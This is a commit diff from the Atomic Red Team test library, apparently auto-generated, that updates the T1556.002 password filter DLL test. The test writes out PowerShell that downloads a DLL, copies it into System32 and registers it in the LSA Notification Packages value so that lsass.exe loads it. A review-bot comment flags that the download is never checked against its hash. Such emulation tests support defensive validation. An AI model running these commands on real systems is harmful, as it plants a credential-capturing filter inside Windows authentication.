Generated docs from job=generate-docs branch=master [ci skip]

This commit is contained in:
Atomic Red Team doc generator
2022-08-29 18:20:24 +00:00
parent 5419dacb9d
commit c4b097e918
2 changed files with 89 additions and 51 deletions
+72 -45
@@ -5902,38 +5902,47 @@ defense-evasion:
atomic_tests:
- name: Install and Register Password Filter DLL
auto_generated_guid: a7961770-beb5-4134-9674-83d7e1fa865c
description: 'Uses PowerShell to install and register a password filter DLL.
Requires a reboot and administrative privileges.
'
description: "Uses PowerShell to install and register a password filter DLL.
Requires a reboot and administrative privileges.\nThe binary in bin is https://www.virustotal.com/gui/file/95140c1ad39fd632d1c1300b246293297aa272ce6035eecc3da56e337200221d/detection\nSource
is in src folder. \nThis does require a reboot to see the filter loaded into
lsass.exe. \nIt does require Administrative privileges to import the clean
registry values back into LSA, it is possible you may have to manually do
this after for cleanup.\n"
supported_platforms:
- windows
input_arguments:
input_dll:
dll_path:
description: Path to DLL to be installed and registered
type: Path
default: PathToAtomicsFolder\T1556.002\src\AtomicPasswordFilter.dll
default: PathToAtomicsFolder\T1556.002\bin
dll_name:
description: Name of the Password Filter
type: String
default: AtomicRedTeamPWFilter.dll
dependency_executor_name: powershell
dependencies:
- description: 'AtomicPasswordFilter.dll must exist on disk at specified location
(#{input_dll})
- description: 'AtomicRedTeamPWFilter.dll must exist on disk at specified location
(#{dll_path}\#{dll_name})
'
prereq_command: 'if (Test-Path #{input_dll}) {exit 0} else {exit 1}
'
get_prereq_command: 'Write-Host "You must provide your own password filter
dll"
prereq_command: 'if (Test-Path #{dll_path}\#{dll_name}) {exit 0} else {exit
1}
'
get_prereq_command: |
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
Invoke-WebRequest "https://github.com/redcanaryco/atomicredteam/atomics/T1556.002/bin/AtomicRedTeamPWFilter.dll" -OutFile "#{dll_path}\#{dll_name}"
executor:
command: |
$passwordFilterName = (Copy-Item "#{input_dll}" -Destination "C:\Windows\System32" -PassThru).basename
reg.exe export HKLM\SYSTEM\CurrentControlSet\Control\Lsa\ PathToAtomicsFolder\T1556.002\lsa_backup.reg
$passwordFilterName = (Copy-Item "#{dll_path}\#{dll_name}" -Destination "C:\Windows\System32" -PassThru).basename
$lsaKey = Get-Item "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\"
$notificationPackagesValues = $lsaKey.GetValue("Notification Packages")
$notificationPackagesValues += $passwordFilterName
Set-ItemProperty "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\" "Notification Packages" $notificationPackagesValues
Restart-Computer -Confirm
cleanup_command: |
reg.exe import PathToAtomicsFolder\T1556.002\lsa_backup.reg
remove-item C:\Windows\System32\#{dll_name}
name: powershell
elevation_required: true
T1600.001:
@@ -51167,38 +51176,47 @@ persistence:
atomic_tests:
- name: Install and Register Password Filter DLL
auto_generated_guid: a7961770-beb5-4134-9674-83d7e1fa865c
description: 'Uses PowerShell to install and register a password filter DLL.
Requires a reboot and administrative privileges.
'
description: "Uses PowerShell to install and register a password filter DLL.
Requires a reboot and administrative privileges.\nThe binary in bin is https://www.virustotal.com/gui/file/95140c1ad39fd632d1c1300b246293297aa272ce6035eecc3da56e337200221d/detection\nSource
is in src folder. \nThis does require a reboot to see the filter loaded into
lsass.exe. \nIt does require Administrative privileges to import the clean
registry values back into LSA, it is possible you may have to manually do
this after for cleanup.\n"
supported_platforms:
- windows
input_arguments:
input_dll:
dll_path:
description: Path to DLL to be installed and registered
type: Path
default: PathToAtomicsFolder\T1556.002\src\AtomicPasswordFilter.dll
default: PathToAtomicsFolder\T1556.002\bin
dll_name:
description: Name of the Password Filter
type: String
default: AtomicRedTeamPWFilter.dll
dependency_executor_name: powershell
dependencies:
- description: 'AtomicPasswordFilter.dll must exist on disk at specified location
(#{input_dll})
- description: 'AtomicRedTeamPWFilter.dll must exist on disk at specified location
(#{dll_path}\#{dll_name})
'
prereq_command: 'if (Test-Path #{input_dll}) {exit 0} else {exit 1}
'
get_prereq_command: 'Write-Host "You must provide your own password filter
dll"
prereq_command: 'if (Test-Path #{dll_path}\#{dll_name}) {exit 0} else {exit
1}
'
get_prereq_command: |
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
Invoke-WebRequest "https://github.com/redcanaryco/atomicredteam/atomics/T1556.002/bin/AtomicRedTeamPWFilter.dll" -OutFile "#{dll_path}\#{dll_name}"
executor:
command: |
$passwordFilterName = (Copy-Item "#{input_dll}" -Destination "C:\Windows\System32" -PassThru).basename
reg.exe export HKLM\SYSTEM\CurrentControlSet\Control\Lsa\ PathToAtomicsFolder\T1556.002\lsa_backup.reg
$passwordFilterName = (Copy-Item "#{dll_path}\#{dll_name}" -Destination "C:\Windows\System32" -PassThru).basename
$lsaKey = Get-Item "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\"
$notificationPackagesValues = $lsaKey.GetValue("Notification Packages")
$notificationPackagesValues += $passwordFilterName
Set-ItemProperty "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\" "Notification Packages" $notificationPackagesValues
Restart-Computer -Confirm
cleanup_command: |
reg.exe import PathToAtomicsFolder\T1556.002\lsa_backup.reg
remove-item C:\Windows\System32\#{dll_name}
name: powershell
elevation_required: true
T1505.005:
@@ -73450,38 +73468,47 @@ credential-access:
atomic_tests:
- name: Install and Register Password Filter DLL
auto_generated_guid: a7961770-beb5-4134-9674-83d7e1fa865c
description: 'Uses PowerShell to install and register a password filter DLL.
Requires a reboot and administrative privileges.
'
description: "Uses PowerShell to install and register a password filter DLL.
Requires a reboot and administrative privileges.\nThe binary in bin is https://www.virustotal.com/gui/file/95140c1ad39fd632d1c1300b246293297aa272ce6035eecc3da56e337200221d/detection\nSource
is in src folder. \nThis does require a reboot to see the filter loaded into
lsass.exe. \nIt does require Administrative privileges to import the clean
registry values back into LSA, it is possible you may have to manually do
this after for cleanup.\n"
supported_platforms:
- windows
input_arguments:
input_dll:
dll_path:
description: Path to DLL to be installed and registered
type: Path
default: PathToAtomicsFolder\T1556.002\src\AtomicPasswordFilter.dll
default: PathToAtomicsFolder\T1556.002\bin
dll_name:
description: Name of the Password Filter
type: String
default: AtomicRedTeamPWFilter.dll
dependency_executor_name: powershell
dependencies:
- description: 'AtomicPasswordFilter.dll must exist on disk at specified location
(#{input_dll})
- description: 'AtomicRedTeamPWFilter.dll must exist on disk at specified location
(#{dll_path}\#{dll_name})
'
prereq_command: 'if (Test-Path #{input_dll}) {exit 0} else {exit 1}
'
get_prereq_command: 'Write-Host "You must provide your own password filter
dll"
prereq_command: 'if (Test-Path #{dll_path}\#{dll_name}) {exit 0} else {exit
1}
'
get_prereq_command: |
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
Invoke-WebRequest "https://github.com/redcanaryco/atomicredteam/atomics/T1556.002/bin/AtomicRedTeamPWFilter.dll" -OutFile "#{dll_path}\#{dll_name}"
executor:
command: |
$passwordFilterName = (Copy-Item "#{input_dll}" -Destination "C:\Windows\System32" -PassThru).basename
reg.exe export HKLM\SYSTEM\CurrentControlSet\Control\Lsa\ PathToAtomicsFolder\T1556.002\lsa_backup.reg
$passwordFilterName = (Copy-Item "#{dll_path}\#{dll_name}" -Destination "C:\Windows\System32" -PassThru).basename
$lsaKey = Get-Item "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\"
$notificationPackagesValues = $lsaKey.GetValue("Notification Packages")
$notificationPackagesValues += $passwordFilterName
Set-ItemProperty "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\" "Notification Packages" $notificationPackagesValues
Restart-Computer -Confirm
cleanup_command: |
reg.exe import PathToAtomicsFolder\T1556.002\lsa_backup.reg
remove-item C:\Windows\System32\#{dll_name}
name: powershell
elevation_required: true
T1558.004:
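Review bot: The new get_prereq_command downloads AtomicRedTeamPWFilter.dll over the network and the executor then copies it into C:\Windows\System32 and appends it to the LSA "Notification Packages" value, yet nothing verifies the downloaded file against the SHA256 the description itself publishes (the VirusTotal identifier 95140c1ad39fd632d1c1300b246293297aa272ce6035eecc3da56e337200221d), so a substituted or corrupted download would be loaded into lsass.exe on the next reboot. The download URL `https://github.com/redcanaryco/atomicredteam/atomics/T1556.002/bin/AtomicRedTeamPWFilter.dll` also carries no raw-content path segment, so it presumably returns an HTML page or 404 rather than the DLL — worth confirming against the repository's real raw URL. A hash check in prereq_command covers both problems: `if ((Test-Path "#{dll_path}\#{dll_name}") -and ((Get-FileHash "#{dll_path}\#{dll_name}" -Algorithm SHA256).Hash -eq "95140c1ad39fd632d1c1300b246293297aa272ce6035eecc3da56e337200221d")) {exit 0} else {exit 1}`. The same change is repeated in the persistence and credential-access hunks of this file, and since this index appears to be generated, the fix belongs in the source T1556.002 atomic definition rather than in this output.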
+17 -6
@@ -15,6 +15,10 @@ Adversaries can register malicious password filters to harvest credentials from
## Atomic Test #1 - Install and Register Password Filter DLL
Uses PowerShell to install and register a password filter DLL. Requires a reboot and administrative privileges.
The binary in bin is https://www.virustotal.com/gui/file/95140c1ad39fd632d1c1300b246293297aa272ce6035eecc3da56e337200221d/detection
Source is in src folder.
This does require a reboot to see the filter loaded into lsass.exe.
It does require Administrative privileges to import the clean registry values back into LSA, it is possible you may have to manually do this after for cleanup.
**Supported Platforms:** Windows
@@ -28,33 +32,40 @@ Uses PowerShell to install and register a password filter DLL. Requires a reboot
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| input_dll | Path to DLL to be installed and registered | Path | PathToAtomicsFolder\T1556.002\src\AtomicPasswordFilter.dll|
| dll_path | Path to DLL to be installed and registered | Path | PathToAtomicsFolder\T1556.002\bin|
| dll_name | Name of the Password Filter | String | AtomicRedTeamPWFilter.dll|
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```powershell
$passwordFilterName = (Copy-Item "#{input_dll}" -Destination "C:\Windows\System32" -PassThru).basename
reg.exe export HKLM\SYSTEM\CurrentControlSet\Control\Lsa\ PathToAtomicsFolder\T1556.002\lsa_backup.reg
$passwordFilterName = (Copy-Item "#{dll_path}\#{dll_name}" -Destination "C:\Windows\System32" -PassThru).basename
$lsaKey = Get-Item "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\"
$notificationPackagesValues = $lsaKey.GetValue("Notification Packages")
$notificationPackagesValues += $passwordFilterName
Set-ItemProperty "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\" "Notification Packages" $notificationPackagesValues
Restart-Computer -Confirm
```
#### Cleanup Commands:
```powershell
reg.exe import PathToAtomicsFolder\T1556.002\lsa_backup.reg
remove-item C:\Windows\System32\#{dll_name}
```
#### Dependencies: Run with `powershell`!
##### Description: AtomicPasswordFilter.dll must exist on disk at specified location (#{input_dll})
##### Description: AtomicRedTeamPWFilter.dll must exist on disk at specified location (#{dll_path}\#{dll_name})
##### Check Prereq Commands:
```powershell
if (Test-Path #{input_dll}) {exit 0} else {exit 1}
if (Test-Path #{dll_path}\#{dll_name}) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
Write-Host "You must provide your own password filter dll"
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
Invoke-WebRequest "https://github.com/redcanaryco/atomicredteam/atomics/T1556.002/bin/AtomicRedTeamPWFilter.dll" -OutFile "#{dll_path}\#{dll_name}"
```